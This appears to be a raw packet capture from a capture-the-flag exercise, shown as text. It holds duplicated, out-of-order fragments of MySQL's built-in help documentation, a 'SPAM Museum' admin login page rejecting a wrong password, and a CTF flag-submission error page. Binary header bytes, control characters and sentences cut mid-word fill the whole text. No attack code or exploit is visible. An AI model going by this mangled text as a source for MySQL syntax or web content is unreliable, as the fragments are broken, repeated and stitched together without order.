|\n+-------------+\n| 3 |\n+-----Cbb0`BiET@/ o09dE<7@@  P@Bp 7=wCDbbBi0`ET@/p܂Ao0E DELETE FROM t WHERE i IN(1,2);\nQuery OK, 2 rows affected (0.00 sec)\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() |\n+-------------+\n| 2 |\n+-------------+\n1 row in set (0.00 sec)',''),(126,'ASIN',4,' ASIN(X)\nReturns the arc sine of X, that is, the value whose sine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ASIN(0.2);\n -> 0.201358\nmysql> SELECT ASIN(\'foo\');\n -> 0.000000',''),(127,'FUNCTION',22,'A user-defined function (UDF) is a way to extend MySQL with a new\nfunction that works like a native (built-in) MySQL function such as\nABS() or CONCAT().\n\nfunction_name is the name that should be used in SQL statements to\ninvoke the function. The RETURNS clause indicates the type of the\nfunction\'s return value. shared_library_name is the basename of the\nshared object file that contains the code that implements the function. The\nfile must be located in a directory that is searched by your system\'s\ndynamic linker.\n\nTo create a function, you must have the INSERT and privilege for the\nmysql database. To drop a function, you must have the DELETE\nprivilege for the mysql database. This is because CREATE\nFUNCTION adds a row to the mysql.func sCWbb0`BiET@/Ԁo0SE DELETE FROM t WHERE i IN(1,2);\nQuery OK, 2 rows affected (0.00 sec)\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() |\n+-------------+\n| 2 |\n+-------------+\n1 row in set (0.00 sec)',''),(126,'ASIN',4,' ASIN(X)\nReturns the arc sine of X, that is, the value whose sine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ASIN(0.2);\n -> 0.201358\nmysql> SELECT ASIN(\'foo\');\n -> 0.000000',''),(127,'FUNCTION',22,'A user-defined function (UDF) is a way to extend MySQL with a new\nfunction that works like a native (built-in) MySQL function such as\nABS() or CONCAT().\n\nfunction_name is the name that should be used in SQL statements to\ninvoke the function. The RETURNS clause indicates the type of the\nfunction\'s return value. shared_library_name is the basename of the\nshared object file that contains the code that implements the function. The\nfile must be located in a directory that is searched by your system\'s\ndynamic linker.\n\nTo create a function, you must have the INSERT and privilege for the\nmysql database. To drop a function, you must have the DELETE\nprivilege for the mysql database. This is because CREATE\nFUNCTION adds a row to the mysql.func sCbbBi0`ET@/p܂Ao0E SELECT SIGN(-32);\n -> -1\nmysql> SELECT SIGN(0);\n -> 0\nmysql> SELECT SIGN(234);\n -> 1',''),(129,'SEC_TO_TIME',14,' SEC_TO_TIME(seconds)\nReturns the seconds argument, converted to hours, minutes, and seconds,\nas a value in \'HH:MM:SS\' or HHMMSS format, depending on whether\nthe function is used in a string or numeric context.\n','mysql> SELECT SEC_TO_TIME(2378);\n -> \'00:39:38\'\nmysql> SELECT SEC_TO_TIME(2378) + 0;\n -> 3938',''),(130,'YEAR TYPE',1,' YEAR[(2|4)]\n\nA year in two-digit or four-digit format. The default is four-digit format.\nIn four-digit format, the\nallowable values are 1901 to 2155, and 0000.\nIn two-digit format, the allowable values are\n70 Cbb0`BiET@/Ԁo0SE SELECT SIGN(-32);\n -> -1\nmysql> SELECT SIGN(0);\n -> 0\nmysql> SELECT SIGN(234);\n -> 1',''),(129,'SEC_TO_TIME',14,' SEC_TO_TIME(seconds)\nReturns the seconds argument, converted to hours, minutes, and seconds,\nas a value in \'HH:MM:SS\' or HHMMSS format, depending on whether\nthe function is used in a string or numeric context.\n','mysql> SELECT SEC_TO_TIME(2378);\n -> \'00:39:38\'\nmysql> SELECT SEC_TO_TIME(2378) + 0;\n -> 3938',''),(130,'YEAR TYPE',1,' YEAR[(2|4)]\n\nA year in two-digit or four-digit format. The default is four-digit format.\nIn four-digit format, the\nallowable values are 1901 to 2155, and 0000.\nIn two-digit format, the allowable values are\n70 C ZZBi0`EL@/܂Sŀo0E4>@?A 3 P.'t )C1ZZ0`BiEL@/go0AE4>@@A 3 P.'t )CbbBi0`ET@/p܂Ao0E SELECT CHARSET(\'abc\');\n -> \'latin1\'\nmysql> SELECT CHARSET(CONVERT(\'abc\' USING utf8));\n -> \'utf8\'\nmysql> SELECT CHARSET(USER());\n -> \'utf8\'',''),(134,'PURGE MASTER LOGS BEFORE TO',6,'PURGE {MASTER | BINARY} LOGS TO \'log_name\'\nPURGE {MASTER | BINARY} LOGS BEFORE \'date\'\n\nDeletes all the binary logs listed in the log\nindex that are strictly prior to the specified log or date.\nThe logs also are removed from the list recorded in the log index file,\nso that the given log becomes the first.\n','',''),(135,'SUBDATE',14,' SUBDATE(date,INTERVAL expr type)\n SUBDATE(expr,days)\n\nWhen invoked with the INTECbb0`BiET@/Ԁo0SE SELECT CHARSET(\'abc\');\n -> \'latin1\'\nmysql> SELECT CHARSET(CONVERT(\'abc\' USING utf8));\n -> \'utf8\'\nmysql> SELECT CHARSET(USER());\n -> \'utf8\'',''),(134,'PURGE MASTER LOGS BEFORE TO',6,'PURGE {MASTER | BINARY} LOGS TO \'log_name\'\nPURGE {MASTER | BINARY} LOGS BEFORE \'date\'\n\nDeletes all the binary logs listed in the log\nindex that are strictly prior to the specified log or date.\nThe logs also are removed from the list recorded in the log index file,\nso that the given log becomes the first.\n','',''),(135,'SUBDATE',14,' SUBDATE(date,INTERVAL expr type)\n SUBDATE(expr,days)\n\nWhen invoked with the INTECZZBi0`EL@/܂Sŀo0E4@? 3 Pb5ڀ"lO ) CZZ0`BiEL@/go0AE4@@ 3 Pb5ڀ"lO ) CbbBi0`ET@/p܂Ao0E SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT SUBDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the number of days to be\nsubtracted from expr.\n\nmysql> SELECT SUBDATE(\'1998-01-02 12:00:00\', 31);\n -> \'1997-12-02 12:00:00\'\n\nNote that you can\'t use format \"%X%V\" to convert a year-week\nstring to date as a year-week doesn\'t uniquely identify a year-month if the\nweek crosses a month boundary. If you want to convert a year-week to a date\nyou can do it by also specifying the week day:\n\nmysql> select str_to_date(\'200442 Monday\', \'%X%V %W\');\n-> 2004-10-18\n','',''),(136,'DAYOFYEAR',14,' DAYOFYEAR(date)\nReturns the day of the year for date, in the range 1 to\n366.\n','mysql> SELECT DAYOFYEAR(\'1998-02-03\');\n -> 34',''),(137,'%',4,' MOD(N,M)\n N % M\n N MOD M\nModulo operation.\nReturns the remainder of N divided by M.\n','mysql> SELECT MOD(234, 10);\n -> 4\nmysql> SELECT 253 % 7;\n -> 1C!bb0`BiET@/Ԁo0SE SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT SUBDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the number of days to be\nsubtracted from expr.\n\nmysql> SELECT SUBDATE(\'1998-01-02 12:00:00\', 31);\n -> \'1997-12-02 12:00:00\'\n\nNote that you can\'t use format \"%X%V\" to convert a year-week\nstring to date as a year-week doesn\'t uniquely identify a year-month if the\nweek crosses a month boundary. If you want to convert a year-week to a date\nyou can do it by also specifying the week day:\n\nmysql> select str_to_date(\'200442 Monday\', \'%X%V %W\');\n-> 2004-10-18\n','',''),(136,'DAYOFYEAR',14,' DAYOFYEAR(date)\nReturns the day of the year for date, in the range 1 to\n366.\n','mysql> SELECT DAYOFYEAR(\'1998-02-03\');\n -> 34',''),(137,'%',4,' MOD(N,M)\n N % M\n N MOD M\nModulo operation.\nReturns the remainder of N divided by M.\n','mysql> SELECT MOD(234, 10);\n -> 4\nmysql> SELECT 253 % 7;\n -> 1CZZBi0`EL@/܂Sŀo0E4@? 3 Pb?"l= ) CZZ0`BiEL@/go0AE4@@ 3 Pb?"l= ) CbbBi0`ET@/p܂Ao0E SELECT MOD(29,9);\n -> 2\nmysql> SELECT 29 MOD 9;\n -> 2',''),(138,'LONGTEXT',1,' LONGTEXT\n\nA TEXT column with a maximum length of 4,294,967,295 or\n4GB (2^32 - 1) characters. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGTEXT columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(139,'DISJOINT',11,' Disjoint(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially disjoint\nfrom (does not intersect) g2.\n','',''),(140,'KILL',6,'Each connection to mysqld runs in a separate thread. You can see\nwhich threads are running with the SHOW PROCESSLIST statement and kill\na thread with the KILL thread_id statement.\n\nAs of MySQL 5.0.0, KILL allows the optional CONNECTION or\nQUERY modifiers:\n\n\n --- KILL CONNECTION is the same as KILL with no modifier:\nIt terminates the connection associated with the given thread_id.\n\n --- KILL QUERY terminates the statement that the connection currently\nis executing, but leaves the connection intact.\n\n\nIf you have the PROCESS privilege, you can see all threads.\nIf you have the SUPER privilege, you can kCZZBi0`EL@/Ao0E4@?  ֞Pg%d?"l6 cmlCbb0`BiET@/Ԁo0SE SELECT MOD(29,9);\n -> 2\nmysql> SELECT 29 MOD 9;\n -> 2',''),(138,'LONGTEXT',1,' LONGTEXT\n\nA TEXT column with a maximum length of 4,294,967,295 or\n4GB (2^32 - 1) characters. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGTEXT columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(139,'DISJOINT',11,' Disjoint(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially disjoint\nfrom (does not intersect) g2.\n','',''),(140,'KILL',6,'Each connection to mysqld runs in a separate thread. You can see\nwhich threads are running with the SHOW PROCESSLIST statement and kill\na thread with the KILL thread_id statement.\n\nAs of MySQL 5.0.0, KILL allows the optional CONNECTION or\nQUERY modifiers:\n\n\n --- KILL CONNECTION is the same as KILL with no modifier:\nIt terminates the connection associated with the given thread_id.\n\n --- KILL QUERY terminates the statement that the connection currently\nis executing, but leaves the connection intact.\n\n\nIf you have the PROCESS privilege, you can see all threads.\nIf you have the SUPER privilege, you can kCZZ0`BiEL@/o0˃2E4@@  ֞Pg%d?"l6 cmlCVbbBi0`ET@/p܂Ao0E SELECT AsText(g) FROM geom;\n+-------------------------+\n| AsText(p1) |\n+-------------------------+\n| POINT(1 1) |\n| LINESTRING(0 0,1 1,2 2) |\n+-------------------------+',''),(142,'LPAD',23,' LPAD(str,len,padstr)\nReturns the string str, left-padded with the string padstr\nto a length of len characters. If str is longer\nthan len, the return value is shortened to len characters.\n','mysql> SELECT LPAD(\'hi\',4,\'??\');\n -> \'??hi\'\nmysql> SELECT LPAD(\'hi\',1,\'??\');\n -> \'h\'',''),(143,'OVERLAPS',11,' Overlaps(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially overlaps\ng2.\nThe term /spatially oveCibb0`BiET@/Ԁo0SE SELECT AsText(g) FROM geom;\n+-------------------------+\n| AsText(p1) |\n+-------------------------+\n| POINT(1 1) |\n| LINESTRING(0 0,1 1,2 2) |\n+-------------------------+',''),(142,'LPAD',23,' LPAD(str,len,padstr)\nReturns the string str, left-padded with the string padstr\nto a length of len characters. If str is longer\nthan len, the return value is shortened to len characters.\n','mysql> SELECT LPAD(\'hi\',4,\'??\');\n -> \'??hi\'\nmysql> SELECT LPAD(\'hi\',1,\'??\');\n -> \'h\'',''),(143,'OVERLAPS',11,' Overlaps(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially overlaps\ng2.\nThe term /spatially oveCbbBi0`ET@/p܂Ao0E SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT NumGeometries(GeomFromText(@gc));\n+----------------------------------+\n| NumGeometries(GeomFromText(@gc)) |\n+----------------------------------+\n| 2 |\n+----------------------------------+',''),(145,'SET GLOBAL SQL_SLAVE_SKIP_COUNTER',7,'SET GLOBAL SQL_SLAVE_SKIP_COUNTER = n\n\nSkip the next n events from the master. This is\nuseful for recovering from replication stops caused by a statement.\n\nThis statement is valid only when the slave thread is not running.\nOtherwise, it produces an error.\n\nBefore MySQL 4.0, omit the GLOBAL keyword from the statement.\n','',''),(146,'MONTHNAME',14,' MONTHNAME(date)\nReturns the full name of the month for date.\n','mysql> SELECT MONTHNAME(\'1998-02-05\');\n -> \'February\'',''),(147,'MBREQUAL',8,' MBREqual(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries gCbb0`BiET@/Ԁo0SE SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT NumGeometries(GeomFromText(@gc));\n+----------------------------------+\n| NumGeometries(GeomFromText(@gc)) |\n+----------------------------------+\n| 2 |\n+----------------------------------+',''),(145,'SET GLOBAL SQL_SLAVE_SKIP_COUNTER',7,'SET GLOBAL SQL_SLAVE_SKIP_COUNTER = n\n\nSkip the next n events from the master. This is\nuseful for recovering from replication stops caused by a statement.\n\nThis statement is valid only when the slave thread is not running.\nOtherwise, it produces an error.\n\nBefore MySQL 4.0, omit the GLOBAL keyword from the statement.\n','',''),(146,'MONTHNAME',14,' MONTHNAME(date)\nReturns the full name of the month for date.\n','mysql> SELECT MONTHNAME(\'1998-02-05\');\n -> \'February\'',''),(147,'MBREQUAL',8,' MBREqual(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries gC7Bi0`E@/Nlo0E/|@?t  3P;D  y'HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:40:10 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Content-Type: text/html SPAM Museum Administrator Interface

Could not understand user name or wrong password!!

C?ZZBi0`EL@/܂Sŀo0E4@? 3 PbI$֥ )CCZZBi0`EL@/Ao0E4@?  ֞Pg%nO"l,r cmnCS0`BiE@/Lo0SE/|@@t  3P;D  y'HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:40:10 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Content-Type: text/html SPAM Museum Administrator Interface

Could not understand user name or wrong password!!

C^ZZ0`BiEL@/go0AE4@@ 3 PbI$֥ )ChZZ0`BiEL@/o0˃2E4@@  ֞Pg%nO"l,r cmnC0ZZBi0`EL@/܂Sŀo0E4@? 3 PbO't )CAZZ0`BiEL@/go0AE4@@ 3 PbO't )CbbBi0`ET@/p܂Ao0E STOP SLAVE; -- if replication was running\nmysql> CHANGE MASTER TO MASTER_PASSWORD=\'new3cret\';\nmysql> START SLAVE; -- if you want to restart replication\n\nThere is no need to specify the parameters that do\nnot change (host, port, user, and so forth).\n\nMASTER_HOST and MASTER_PORT are the hostname (or IP address) of\nthe master host and its TCP/IP port. Note that if MASTER_HOST is\nequal to localhost, then, like in other parts of MySQL, the port\nmay be ignored (if Unix socket files can be used, for example).\n\nIf you specify MASTER_HOST or MASTER_PORT,\nthe slave assumes that the master server is different than\nbefore (even if you specify a host or port value that is\nthe same as the current value.) In this case, the old values for the master\nbinary log name and position areCZZBi0`EL@/Ao0E4@?  ֞Pg%x_"l"` cmnCbb0`BiET@/Ԁo0SE STOP SLAVE; -- if replication was running\nmysql> CHANGE MASTER TO MASTER_PASSWORD=\'new3cret\';\nmysql> START SLAVE; -- if you want to restart replication\n\nThere is no need to specify the parameters that do\nnot change (host, port, user, and so forth).\n\nMASTER_HOST and MASTER_PORT are the hostname (or IP address) of\nthe master host and its TCP/IP port. Note that if MASTER_HOST is\nequal to localhost, then, like in other parts of MySQL, the port\nmay be ignored (if Unix socket files can be used, for example).\n\nIf you specify MASTER_HOST or MASTER_PORT,\nthe slave assumes that the master server is different than\nbefore (even if you specify a host or port value that is\nthe same as the current value.) In this case, the old values for the master\nbinary log name and position areCZZ0`BiEL@/o0˃2E4@@  ֞Pg%x_"l"` cmnCpZZBi0`EL@/܂Sŀo0E4@? 3 PbT )nj )CZZ0`BiEL@/go0AE4@@ 3 PbT )nj )CbbBi0`ET@/p܂Ao0E SELECT 1 && 1;\n -> 1\nmysql> SELECT 1 && 0;\n -> 0\nmysql> SELECT 1 && NULL;\n -> NULL\nmysql> SELECT 0 && NULL;\n -> 0\nmysql> SELECT NULL && 0;\n -> 0',''),(250,'X',16,' X(p)\nReturns the X-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT X(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| X(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 56.7 |\n+--------------------------------------+',''),(251,'FOUND_ROWS',25,'\nA SELECT statement may include a LIMIT clause to restrict the\nnumber of rows the server returns to Cbb0`BiET@/Ԁo0SE<@@K^  3PWtڀ & )M,D)] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DOUBLE.\nException: If the server SQL mode includes the REAL_AS_FLOAT option,\nREAL is a synonym for FLOAT rather than DOUBLE.\n','',''),(248,'TIME',1,' TIME\n\nA time. The range is \'-838:59:59\' to \'838:59:59\'.\nMySQL displays TIME values in \'HH:MM:SS\' format, but\nallows you to assign values to TIME columns using either strings or\nnumbers.\n','',''),(249,'&&',20,' AND\n &&\nLogical AND.\nEvaluates to 1 if all operands are non-zero and not NULL,\nto 0 if one or more operands are 0,\notherwise NULL is returned.\n','mysql> SELECT 1 && 1;\n -> 1\nmysql> SELECT 1 && 0;\n -> 0\nmysql> SELECT 1 && NULL;\n -> NULL\nmysql> SELECT 0 && NULL;\n -> 0\nmysql> SELECT NULL && 0;\n -> 0',''),(250,'X',16,' X(p)\nReturns the X-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT X(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| X(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 56.7 |\n+--------------------------------------+',''),(251,'FOUND_ROWS',25,'\nA SELECT statement may include a LIMIT clause to restrict the\nnumber of rows the server returns to C ZZBi0`EL@/Ao0E4@?  ֞Pg%o"lI cmrC ZZ0`BiEL@/o0˃2E4@@  ֞Pg%o"lI cmrC4 ZZBi0`EL@/܂Sŀo0E4@? 3 Pb^)x )C; ZZBi0`EL@/܂Sŀo0E4@?R 3 PZi%"lo )^KCI ZZ0`BiEL@/go0AE4@@ 3 Pb^)x )CT ZZ0`BiEL@/o0  E4@@Q 3 PZi%"lo )^KC bbBi0`ET@/p܂Ao0E<@?L]  3PWtڀ v )the client.\nIn some cases, it is desirable to know how many rows the statement would have\nreturned without the LIMIT, but without running the statement again.\nTo get this row count, include a SQL_CALC_FOUND_ROWS option in the\nSELECT statement, then invoke FOUND_ROWS() afterward:\n','mysql> SELECT SQL_CALC_FOUND_ROWS * FROM tbl_name\n -> WHERE id > 100 LIMIT 10;\nmysql> SELECT FOUND_ROWS();',''),(252,'SYSTEM_USER',25,' SYSTEM_USER()\n\nSYSTEM_USER() is a synonym for USER().\n','',''),(253,'CROSSES',11,' Crosses(g1,g2)\nReturns 1 if g1 spatially crosses g2.\nReturns NULL if g1 is a Polygon or a MultiPolygon,\nor if g2 is a Point or a MultiPoint.\nOtherwise, returns 0.\n\nThe term /spatially crosses/ denotes a spatial relation between two given\ngeometries that has the following properties:\n\n\n --- The two geometries intersect\n\n --- Their intersection results in a geometry that has\na dimension that is one less than the maximum dimension of the two given\ngeometries\n\n --- Their intersection is not equal to either of the two given geometries\n','',''),(254,'TRUNCATE TABLE',6,'TRUNCATE TABLE empties a table completely.\nLogically, this is equivalent to a DELETE statement that deletes all\nrows, but there are practical differences under some circumstances.\C kkBiʪE]@/o0oo0EE@@i P~4h*IR 7=wF1HTTP/1.0 200 OK C bb0`BiET@/Ԁo0SE<@@K]  3PWtڀ v )the client.\nIn some cases, it is desirable to know how many rows the statement would have\nreturned without the LIMIT, but without running the statement again.\nTo get this row count, include a SQL_CALC_FOUND_ROWS option in the\nSELECT statement, then invoke FOUND_ROWS() afterward:\n','mysql> SELECT SQL_CALC_FOUND_ROWS * FROM tbl_name\n -> WHERE id > 100 LIMIT 10;\nmysql> SELECT FOUND_ROWS();',''),(252,'SYSTEM_USER',25,' SYSTEM_USER()\n\nSYSTEM_USER() is a synonym for USER().\n','',''),(253,'CROSSES',11,' Crosses(g1,g2)\nReturns 1 if g1 spatially crosses g2.\nReturns NULL if g1 is a Polygon or a MultiPolygon,\nor if g2 is a Point or a MultiPoint.\nOtherwise, returns 0.\n\nThe term /spatially crosses/ denotes a spatial relation between two given\ngeometries that has the following properties:\n\n\n --- The two geometries intersect\n\n --- Their intersection results in a geometry that has\na dimension that is one less than the maximum dimension of the two given\ngeometries\n\n --- Their intersection is not equal to either of the two given geometries\n','',''),(254,'TRUNCATE TABLE',6,'TRUNCATE TABLE empties a table completely.\nLogically, this is equivalent to a DELETE statement that deletes all\nrows, but there are practical differences under some circumstances.\C kk0`BiE]@/πo0  EE@@i P~4h*IR 7=wF1HTTP/1.0 200 OK CJJBiʪE<@/'o0oo0E$@@g P~4y*I> 7=wF1Content-Type: text/html CTF Flag Submission

Error submitting flag

A flag is 40 characters long. The flag you submitted was too short.


Try again, enter your flag here:

C&JJ0`BiE<@/o0  E$@@g P~4y*I> 7=wF1Content-Type: text/html CTF Flag Submission

Error submitting flag

A flag is 40 characters long. The flag you submitted was too short.


Try again, enter your flag here:

CbbBi0`ET@/p܂Ao0E CHANGE MASTER TO\n -> MASTER_HOST=\'master2.mycompany.com\',\n -> MASTER_USER=\'replication\',\n -> MASTER_PASSWORD=\'bigs3cret\',\n -> MASTER_PORT=3306,\n -> MASTER_LOG_FILE=\'master2-bin.001\',\n -> MASTER_LOG_POS=4,\n -> MASTER_CONNECT_RETRY=10;\n\nmysql> CHANGE MASTER TO\n -> RELAY_LOG_FILE=\'slave-relay-bin.006\',\n -> RELAY_LOG_POS=4025;\n','',''),(149,'DROP DATABASE',28,'DROP DATABASE drops all tables in the database and deletes the\ndatabase. Be /very/ careful with this statement!\nTo use DROP DATABASE, you need the DROP privilege on the\ndatabase.\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring if the database doesn\'t exist.\n\nDROP SCHEMA can be used as of MySQL 5.0.2.\n','DROP {DATABASE | SCHECZZBi0`EL@/܂Sŀo0E4@? 3 Pbh*)d )Cbb0`BiET@/Ԁo0SE CHANGE MASTER TO\n -> MASTER_HOST=\'master2.mycompany.com\',\n -> MASTER_USER=\'replication\',\n -> MASTER_PASSWORD=\'bigs3cret\',\n -> MASTER_PORT=3306,\n -> MASTER_LOG_FILE=\'master2-bin.001\',\n -> MASTER_LOG_POS=4,\n -> MASTER_CONNECT_RETRY=10;\n\nmysql> CHANGE MASTER TO\n -> RELAY_LOG_FILE=\'slave-relay-bin.006\',\n -> RELAY_LOG_POS=4025;\n','',''),(149,'DROP DATABASE',28,'DROP DATABASE drops all tables in the database and deletes the\ndatabase. Be /very/ careful with this statement!\nTo use DROP DATABASE, you need the DROP privilege on the\ndatabase.\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring if the database doesn\'t exist.\n\nDROP SCHEMA can be used as of MySQL 5.0.2.\n','DROP {DATABASE | SCHECZZ0`BiEL@/go0AE4@@ 3 Pbh*)d )CbbBi0`ET@/p܂Ao0E SELECT TIMESTAMP(\'2003-12-31\');\n -> \'2003-12-31 00:00:00\'\nmysql> SELECT TIMESTAMP(\'2003-12-31 12:00:00\',\'12:00:00\');\n -> \'2004-01-01 00:00:00\'',''),(151,'CHARACTER_LENGTH',23,' CHARACTER_LENGTH(str)\n\nCHARACTER_LENGTH() is a synonym for CHAR_LENGTH().\n','',''),(152,'CREATE VIEW ALGORITHM MERGE TEMPTABLE WITH CHECK OPTION',24,'','CREATE [OR REPLACE] [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]',''),(153,'TIMESTAMPDIFF FUNCTION',14,'','mysql> SELECT TIMESTAMPDIFF(MONTH,\'2003-02-01\',\'2003-05-01\');\n -> 3\nmysql> SELECT TIMESTAMPDIFF(YEAR,\'2002-05-01\',\'2001-01-01\');\n -> -1',''),(154,'CRC32',4,' CRC32(expr)\nComputes a cyclic redundancy check value and returns a 32-bit unsigned value.\nThe result is NULL if the argument is NULL.\nThe argument is expected be a string and is treated as one if iCbb0`BiET@/Ԁo0SE SELECT TIMESTAMP(\'2003-12-31\');\n -> \'2003-12-31 00:00:00\'\nmysql> SELECT TIMESTAMP(\'2003-12-31 12:00:00\',\'12:00:00\');\n -> \'2004-01-01 00:00:00\'',''),(151,'CHARACTER_LENGTH',23,' CHARACTER_LENGTH(str)\n\nCHARACTER_LENGTH() is a synonym for CHAR_LENGTH().\n','',''),(152,'CREATE VIEW ALGORITHM MERGE TEMPTABLE WITH CHECK OPTION',24,'','CREATE [OR REPLACE] [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]',''),(153,'TIMESTAMPDIFF FUNCTION',14,'','mysql> SELECT TIMESTAMPDIFF(MONTH,\'2003-02-01\',\'2003-05-01\');\n -> 3\nmysql> SELECT TIMESTAMPDIFF(YEAR,\'2002-05-01\',\'2001-01-01\');\n -> -1',''),(154,'CRC32',4,' CRC32(expr)\nComputes a cyclic redundancy check value and returns a 32-bit unsigned value.\nThe result is NULL if the argument is NULL.\nThe argument is expected be a string and is treated as one if iCbbBi0`ET@/"أ  o0E<@?%w  3PZ3K}W _0(Cbb0`BiET@/Ԁo0SE<@@$w  3PZ3K} _0(CTbbBi0`ET@/p܂Ao0E SELECT CRC32(\'MySQL\');\n -> 3259397556',''),(155,'XOR',20,' XOR\nLogical XOR.\nReturns NULL if either operand is NULL.\nFor non-NULL operands, evaluates to 1 if an odd number\nof operands is non-zero,\notherwise 0 is returned.\n','mysql> SELECT 1 XOR 1;\n -> 0\nmysql> SELECT 1 XOR 0;\n -> 1\nmysql> SELECT 1 XOR NULL;\n -> NULL\nmysql> SELECT 1 XOR 1 XOR 1;\n -> 1',''),(156,'STARTPOINT',18,' StartPoint(ls)\nReturns the Point that is the start point of the LineString value\nls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(StartPoint(GeomFromText(@ls)));\n+---------------------------------------+\n| AsText(StartPoint(GeomFromText(@ls))) |\n+---------------------------------------+\n| POINT(1 1) |\n+---------------------------------------+',''),(157,'MPOLYFROMTEXT',3,' MPolyFromText(wkt[,srid])\n MultiPolygonFromText(wkt[,srid])\nConstructs a MULTIPOLYGON value using its WKT representation and SRID.\n','',''),(158,'MBRINTERSECTS',8,' MBRIntersects(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 intersect.\n','',''),(159,'BIT_OR',12,' BIT_OR(expr)\nReturns the bitwise OR of all bits inCfbb0`BiET@/Ԁo0SE SELECT CRC32(\'MySQL\');\n -> 3259397556',''),(155,'XOR',20,' XOR\nLogical XOR.\nReturns NULL if either operand is NULL.\nFor non-NULL operands, evaluates to 1 if an odd number\nof operands is non-zero,\notherwise 0 is returned.\n','mysql> SELECT 1 XOR 1;\n -> 0\nmysql> SELECT 1 XOR 0;\n -> 1\nmysql> SELECT 1 XOR NULL;\n -> NULL\nmysql> SELECT 1 XOR 1 XOR 1;\n -> 1',''),(156,'STARTPOINT',18,' StartPoint(ls)\nReturns the Point that is the start point of the LineString value\nls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(StartPoint(GeomFromText(@ls)));\n+---------------------------------------+\n| AsText(StartPoint(GeomFromText(@ls))) |\n+---------------------------------------+\n| POINT(1 1) |\n+---------------------------------------+',''),(157,'MPOLYFROMTEXT',3,' MPolyFromText(wkt[,srid])\n MultiPolygonFromText(wkt[,srid])\nConstructs a MULTIPOLYGON value using its WKT representation and SRID.\n','',''),(158,'MBRINTERSECTS',8,' MBRIntersects(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 intersect.\n','',''),(159,'BIT_OR',12,' BIT_OR(expr)\nReturns the bitwise OR of all bits inCZZBi0`EL@/܂Sŀo0E4@? 3 Pbr:)S )CZZ0`BiEL@/go0AE4@@ 3 Pbr:)S )CbbBi0`ET@/p܂Ao0E SELECT YEARWEEK(\'1987-01-01\');\n -> 198653',''),(161,'NOT BETWEEN',26,' expr NOT BETWEEN min AND max\nThis is the same as NOT (expr BETWEEN min AND max).\n','',''),(162,'LOG10',4,' LOG10(X)\nReturns the base-10 logarithm of X.\n','mysql> SELECT LOG10(2);\n -> 0.301030\nmysql> SELECT LOG10(100);\n -> 2.000000\nmysql> SELECT LOG10(-100);\n -> NULL',''),(163,'SQRT',4,' SQRT(X)\nReturns the non-negative square root of X.\n','mysql> SELECT SQRT(4);\n -> 2.000000\nmysql> SELECT SQRT(20);\n -> 4.472136',''),(164,'DECIMAL',1,' DECIMAL[(M[,D])] [UNSIGNED] [ZEROFILL]\n\n\nFor MySQL 5.0.3 and above:\n\nA packed ``exact\'\' fixed-point number. M is the total number of\ndigits and D is the number of decimals. The decimal point and\n(for negative numbers) the \'-\' sign are not counted in M.\nIf D is 0, values have no\ndecimal point or fractional part. 